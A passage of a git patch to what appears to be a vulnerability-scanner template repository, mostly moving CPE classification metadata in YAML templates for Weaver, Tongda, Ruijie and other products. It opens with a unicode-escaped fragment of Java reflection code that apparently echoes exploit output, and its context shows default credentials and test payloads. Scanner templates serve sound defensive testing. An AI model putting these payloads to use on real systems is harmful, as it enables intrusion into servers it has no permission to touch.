\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d '
diff --git a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
index 03583ba456..139f77e820 100644
--- a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
+++ b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml
@@ -7,6 +7,8 @@ info:
description: Office Web Apps Server Full Read is vulnerable to SSRF.
reference:
- https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
+ classification:
+ cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -15,8 +17,6 @@ info:
product: office_web_apps_server
vendor: microsoft
tags: microsoft,office-webapps,redirect
- classification:
- cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:*
variables:
oast: "{{interactsh-url}}"
string: "{{to_lower(rand_text_alpha(4))}}"
diff --git a/http/vulnerabilities/other/flir-ax8-rce.yaml b/http/vulnerabilities/other/flir-ax8-rce.yaml
index a4c876e91d..61b2f114e5 100644
--- a/http/vulnerabilities/other/flir-ax8-rce.yaml
+++ b/http/vulnerabilities/other/flir-ax8-rce.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://www.exploit-db.com/exploits/45602
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20res.php%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+ classification:
+ cpe: cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -16,8 +18,6 @@ info:
product: flir_ax8_firmware
vendor: flir
tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated
- classification:
- cpe: cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*
variables:
username: admin
password: admin
diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml
index 80e8ecf99f..4f9040f5ce 100644
--- a/http/vulnerabilities/other/opencart-core-sqli.yaml
+++ b/http/vulnerabilities/other/opencart-core-sqli.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://www.exploit-db.com/exploits/51940
- https://cxsecurity.com/issue/WLB-2024040004
+ classification:
+ cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: title:"OpenCart"
@@ -16,8 +18,6 @@ info:
product: opencart
vendor: opencart
tags: opencart,sqli
- classification:
- cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
index 01a3c9360b..423e8a9904 100644
--- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
@@ -8,6 +8,8 @@ info:
There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions.
reference:
- https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py
+ classification:
+ cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
@@ -15,8 +17,7 @@ info:
product: rg-uac
vendor: ruijie
tags: rg-uac,file-upload,intrusive,ruijie
- classification:
- cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:*
+
variables:
random_str: "{{rand_base(6)}}"
match_str: "{{md5(random_str)}}"
diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml
index 5ff47a466d..6075609ebe 100755
--- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml
+++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml
@@ -8,6 +8,8 @@ info:
There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+ classification:
+ cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -15,8 +17,7 @@ info:
product: office_anywhere
vendor: tongda2000
tags: tongda,rce
- classification:
- cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
+
variables:
num: '999999999'
payload: "echo md5({{num}});"
diff --git a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
index 3771e1dd1f..201db8197a 100644
--- a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
+++ b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
@@ -8,6 +8,8 @@ info:
Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
reference:
- https://github.com/RCEraser/cve/blob/main/Weaver.md
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -15,8 +17,7 @@ info:
product: e-office
vendor: weaver
tags: e-office,weaver,intrusive,file-upload
- classification:
- cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
+
variables:
filename: '{{rand_base(7, "abc")}}'
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
index bbceca8e42..9806ace3e5 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -8,6 +8,8 @@ info:
When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
reference:
- https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -16,8 +18,7 @@ info:
product: e-cology
vendor: weaver
tags: ecology,weaver,oa,sqli
- classification:
- cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
+
variables:
num: "999999999"
diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
index 03c04d9446..44177beb47 100755
--- a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
@@ -8,6 +8,8 @@ info:
There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
reference:
- https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -16,8 +18,7 @@ info:
product: e-cology
vendor: weaver
tags: ecology,weaver,oa,sqli
- classification:
- cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
+
variables:
num: "999999999"
diff --git a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
index eb49c377f7..752f06dec4 100755
--- a/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
@@ -7,6 +7,8 @@ info:
description: Arbitrary File Upload in OA E-Office jQuery.
reference:
- https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
@@ -14,8 +16,7 @@ info:
product: e-office
vendor: weaver
tags: weaver,e-office,oa,instrusive,rce,intrusive
- classification:
- cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
+
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "{{randstr}}"
diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
index f69bda6c3c..1785f468b3 100755
--- a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@@ -8,6 +8,8 @@ info:
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
reference:
- https://buaq.net/go-117479.html
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -16,8 +18,7 @@ info:
product: e-cology
vendor: weaver
tags: weaver,ecology,fileupload,intrusive
- classification:
- cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
+
variables:
num1: "{{rand_int(40000, 50000)}}"
num2: "{{rand_int(40000, 50000)}}"
diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
index 10e7a1756d..794b905aa8 100755
--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -8,6 +8,8 @@ info:
OA E-Office OfficeServer.php has an arbitrary file upload vulnerability. Attackers can obtain sensitive information on the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20OfficeServer.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+ classification:
+ cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -15,8 +17,7 @@ info:
product: e-office
vendor: weaver
tags: weaver,e-office,oa,rce,intrusive,fileupload
- classification:
- cpe: cpe:2.3:a:weaver:e-office:*:*:*:*:*:*:*:*
+
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "weaver-office-server-file-upload"
diff --git a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
index 07d85433e7..225ba659ce 100755
--- a/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
@@ -9,14 +9,15 @@ info:
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
max-request: 3
fofa-query: app="泛微-协同办公OA"
product: e-cology
vendor: weaver
tags: ecology,fileupload,intrusive
- classification:
- cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
+
variables:
filename: "{{to_lower(rand_base(5))}}"
string: "{{randstr}}"
diff --git a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml
index edfe479688..95ac061288 100644
--- a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml
+++ b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml
@@ -12,6 +12,8 @@ info:
- http://wordpress.org/extend/plugins/gallery-plugin/
- http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
- https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
+ classification:
+ cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
@@ -20,8 +22,7 @@ info:
product: gallery
vendor: bestwebsoft
tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
- classification:
- cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:*
+
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
index 740d839410..b07016b364 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://www.seebug.org/vuldb/ssvid-99547
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
+ classification:
+ cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -16,8 +18,7 @@ info:
product: ufida-nc
vendor: yonyou
tags: yonyou,intrusive,ufida,fileupload
- classification:
- cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:*
+
variables:
v1: "{{rand_int(1,100)}}"
diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
index 5a9dc06e87..373944a7b9 100644
--- a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
+++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
@@ -7,6 +7,8 @@ info:
description: ZzzCMS (A Lightweight ASP.NET content management system) is vulnerable to SSRF(Server-Side Request Forgery).
reference:
- https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
+ classification:
+ cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -15,8 +17,7 @@ info:
product: zzzcms
vendor: zzzcms
tags: zzzcms,ssrf,oast
- classification:
- cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
+
variables:
filename: "{{to_lower(rand_text_alpha(4))}}"
From 7d276ebee0677c095ce56af59e0d1c65bf8e2dd6 Mon Sep 17 00:00:00 2001
From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com>
Date: Tue, 10 Sep 2024 14:38:16 +0530
Subject: [PATCH 3/3] Fix classification
Fix classification
---
http/cnvd/2020/CNVD-2020-63964.yaml | 19 ++++++++--------
http/cnvd/2021/CNVD-2021-15822.yaml | 11 +++++-----
http/cnvd/2022/CNVD-2022-43245.yaml | 10 ++++-----
http/cnvd/2024/CNVD-2024-15077.yaml | 11 +++++-----
http/cves/2023/CVE-2023-42344.yaml | 15 ++++++++-----
http/cves/2024/CVE-2024-27564.yaml | 11 +++++-----
http/cves/2024/CVE-2024-33288.yaml | 12 +++++-----
http/cves/2024/CVE-2024-34982.yaml | 13 +++++------
http/cves/2024/CVE-2024-3552.yaml | 13 +++++------
http/cves/2024/CVE-2024-36837.yaml | 12 +++++-----
http/cves/2024/CVE-2024-37032.yaml | 12 +++++-----
http/cves/2024/CVE-2024-37152.yaml | 11 +++++-----
http/cves/2024/CVE-2024-38289.yaml | 12 +++++-----
http/cves/2024/CVE-2024-3922.yaml | 12 +++++-----
http/cves/2024/CVE-2024-6781.yaml | 21 +++++++++---------
http/cves/2024/CVE-2024-6782.yaml | 11 +++++-----
http/cves/2024/CVE-2024-6922.yaml | 5 +++--
.../apache/apache-apollo-default-login.yaml | 13 +++++------
.../apache/cloudstack-default-login.yaml | 13 +++++------
.../apache/kylin-default-login.yaml | 10 ++++-----
.../apache/tomcat-default-login.yaml | 16 +++++++-------
.../asus/asus-rtn16-default-login.yaml | 11 +++++-----
.../barco-clickshare-default-login.yaml | 20 ++++++++---------
.../batflat/batflat-default-login.yaml | 10 ++++-----
.../bloofoxcms-default-login.yaml | 10 ++++-----
.../crushftp/crushftp-anonymous-login.yaml | 14 +++++-------
.../crushftp/crushftp-default-login.yaml | 16 ++++++--------
.../dataease/dataease-default-login.yaml | 11 +++++-----
.../elasticsearch-default-login.yaml | 10 ++++-----
.../esafenet-cdg-default-login.yaml | 10 ++++-----
.../eurotel/etl3100-default-login.yaml | 10 ++++-----
.../feiyuxing/feiyuxing-default-login.yaml | 10 ++++-----
.../franklin-fueling-default-login.yaml | 10 ++++-----
.../fuji-xerox/fuji-xerox-default-login.yaml | 19 ++++++++--------
.../gitblit/gitblit-default-login.yaml | 19 ++++++++--------
.../ispconfig-hcp-default-login.yaml | 19 ++++++++--------
.../jeedom/jeedom-default-login.yaml | 13 +++++------
.../mantisbt/mantisbt-anonymous-login.yaml | 11 +++++-----
.../nacos/nacos-default-login.yaml | 10 ++++-----
.../netflow/netflow-default-login.yaml | 11 +++++-----
.../node-red/nodered-default-login.yaml | 11 +++++-----
.../o2oa/o2oa-default-login.yaml | 10 ++++-----
.../others/aruba-instant-default-login.yaml | 10 ++++-----
.../inspur-clusterengine-default-login.yaml | 16 +++++++-------
.../powerjob-default-login.yaml | 10 ++++-----
.../pyload/pyload-default-login.yaml | 10 ++++-----
.../rainloop/rainloop-default-login.yaml | 11 +++++-----
.../default-logins/rconfig-default-login.yaml | 10 ++++-----
.../riello/netman-default-login.yaml | 10 ++++-----
.../rundeck/rundeck-default-login.yaml | 13 +++++------
.../softether-vpn-default-login.yaml | 13 ++++++-----
.../splunk/splunk-default-login.yaml | 13 ++++++-----
http/default-logins/wazuh-default-login.yaml | 11 +++++-----
http/exposed-panels/acti-panel.yaml | 11 +++++-----
http/exposed-panels/adguard-panel.yaml | 19 ++++++++--------
http/exposed-panels/airos-panel.yaml | 11 +++++-----
.../apache/apache-apollo-panel.yaml | 11 +++++-----
http/exposed-panels/aspcms-backend-panel.yaml | 11 +++++-----
.../atlassian-bamboo-panel.yaml | 11 +++++-----
http/exposed-panels/audiobookshelf-panel.yaml | 4 ++--
http/exposed-panels/authelia-panel.yaml | 11 +++++-----
.../beyondtrust-priv-panel.yaml | 12 +++++-----
http/exposed-panels/bonobo-server-panel.yaml | 13 ++++++-----
.../busybox-repository-browser.yaml | 11 +++++-----
http/exposed-panels/c2/caldera-c2.yaml | 11 +++++-----
.../exposed-panels/changedetection-panel.yaml | 11 +++++-----
http/exposed-panels/cisco-unity-panel.yaml | 13 ++++++-----
.../cisco/cisco-expressway-panel.yaml | 11 +++++-----
http/exposed-panels/craftercms-panel.yaml | 11 +++++-----
http/exposed-panels/cyberchef-panel.yaml | 11 +++++-----
http/exposed-panels/dialogic-xms-console.yaml | 11 +++++-----
http/exposed-panels/discuz-panel.yaml | 11 +++++-----
http/exposed-panels/dockge-panel.yaml | 11 +++++-----
http/exposed-panels/dokuwiki-panel.yaml | 11 +++++-----
http/exposed-panels/doris-panel.yaml | 11 +++++-----
http/exposed-panels/emqx-panel.yaml | 11 +++++-----
.../endpoint-protector-panel.yaml | 11 +++++-----
.../fortinet/forticlientems-panel.yaml | 11 +++++-----
http/exposed-panels/fossbilling-panel.yaml | 11 +++++-----
http/exposed-panels/freshrss-panel.yaml | 19 ++++++++--------
http/exposed-panels/ghost-panel.yaml | 11 +++++-----
.../gradle/gradle-develocity-panel.yaml | 19 ++++++++--------
http/exposed-panels/graylog-panel.yaml | 11 +++++-----
http/exposed-panels/ibm/ibm-odm-panel.yaml | 13 ++++++-----
http/exposed-panels/isams-panel.yaml | 11 +++++-----
http/exposed-panels/jsherp-boot-panel.yaml | 11 +++++-----
http/exposed-panels/kiali-panel.yaml | 11 +++++-----
http/exposed-panels/koel-panel.yaml | 12 +++++-----
http/exposed-panels/kopano-webapp-panel.yaml | 12 +++++-----
http/exposed-panels/label-studio-panel.yaml | 11 +++++-----
http/exposed-panels/librephotos-panel.yaml | 11 +++++-----
http/exposed-panels/mitel-micollab-panel.yaml | 11 +++++-----
http/exposed-panels/mobileiron-sentry.yaml | 11 +++++-----
http/exposed-panels/monitorr-panel.yaml | 11 +++++-----
.../moodle-workplace-panel.yaml | 11 +++++-----
http/exposed-panels/n8n-panel.yaml | 11 +++++-----
.../netflow-analyzer-panel.yaml | 19 ++++++++--------
http/exposed-panels/nocodb-panel.yaml | 12 +++++-----
http/exposed-panels/openedge-panel.yaml | 19 ++++++++--------
http/exposed-panels/openvas-panel.yaml | 11 +++++-----
.../oracle-ebusiness-panel.yaml | 12 +++++-----
.../outsystems-servicecenter-panel.yaml | 11 +++++-----
http/exposed-panels/passbolt-panel.yaml | 11 +++++-----
http/exposed-panels/phpldapadmin-panel.yaml | 11 +++++-----
http/exposed-panels/posteio-admin-panel.yaml | 11 +++++-----
.../qlikview-accesspoint-panel.yaml | 12 +++++-----
.../redis-enterprise-panel.yaml | 11 +++++-----
http/exposed-panels/redmine-panel.yaml | 11 +++++-----
http/exposed-panels/rocketchat-panel.yaml | 11 +++++-----
.../scriptcase/scriptcase-panel.yaml | 11 +++++-----
.../scriptcase/scriptcase-prod-login.yaml | 11 +++++-----
http/exposed-panels/softether-vpn-panel.yaml | 11 +++++-----
http/exposed-panels/speedtest-panel.yaml | 11 +++++-----
.../exposed-panels/suprema-biostar-panel.yaml | 11 +++++-----
http/exposed-panels/tibco-spotfire-panel.yaml | 4 ++--
http/exposed-panels/tigase-xmpp-server.yaml | 11 +++++-----
http/exposed-panels/tiny-rss-panel.yaml | 11 +++++-----
.../uipath-orchestrator-panel.yaml | 11 +++++-----
http/exposed-panels/unibox-panel.yaml | 11 +++++-----
http/exposed-panels/uptime-kuma-panel.yaml | 11 +++++-----
http/exposed-panels/urbackup-panel.yaml | 11 +++++-----
.../webtransfer-client-panel.yaml | 11 +++++-----
http/exposed-panels/whatsup-gold-panel.yaml | 13 ++++++-----
http/exposed-panels/yellowfin-panel.yaml | 11 +++++-----
.../exposed-panels/zenml-dashboard-panel.yaml | 13 ++++++-----
http/exposures/apis/jeecg-boot-swagger.yaml | 11 +++++-----
http/exposures/apis/seafile-api.yaml | 10 ++++-----
.../exposures/configs/codeception-config.yaml | 4 ++--
.../configs/filestash-admin-config.yaml | 11 +++++-----
http/exposures/configs/jkstatus-manager.yaml | 11 +++++-----
http/exposures/configs/phpsys-info.yaml | 10 ++++-----
.../configs/rakefile-disclosure.yaml | 10 ++++-----
http/exposures/configs/yii-debugger.yaml | 11 +++++-----
http/exposures/files/angular-json.yaml | 10 ++++-----
.../files/azure-pipelines-exposed.yaml | 11 +++++-----
http/exposures/files/bitbucket-pipelines.yaml | 10 ++++-----
http/exposures/files/cargo-toml-file.yaml | 10 ++++-----
.../files/cold-fusion-cfcache-map.yaml | 17 +++++++-------
http/exposures/files/composer-auth-json.yaml | 11 +++++-----
http/exposures/files/django-secret-key.yaml | 10 ++++-----
http/exposures/files/environment-rb.yaml | 11 +++++-----
.../files/get-access-token-json.yaml | 11 +++++-----
http/exposures/files/git-mailmap.yaml | 11 +++++-----
http/exposures/files/gitlab-ci-yml.yaml | 11 +++++-----
http/exposures/files/go-mod-disclosure.yaml | 11 +++++-----
http/exposures/files/gradle-libs.yaml | 10 ++++-----
.../exposures/files/npm-cli-metrics-json.yaml | 11 +++++-----
.../files/npm-shrinkwrap-exposure.yaml | 10 ++++-----
.../exposures/files/nuget-package-config.yaml | 10 ++++-----
http/exposures/files/oracle-test-cgi.yaml | 10 ++++-----
http/exposures/files/php-ini.yaml | 11 +++++-----
.../files/phpunit-result-cache-exposure.yaml | 11 +++++-----
.../files/pipeline-configuration.yaml | 10 ++++-----
.../files/putty-private-key-disclosure.yaml | 11 +++++-----
http/exposures/files/redmine-settings.yaml | 10 ++++-----
http/exposures/files/ruby-rail-storage.yaml | 11 +++++-----
http/exposures/files/secret-token-rb.yaml | 11 +++++-----
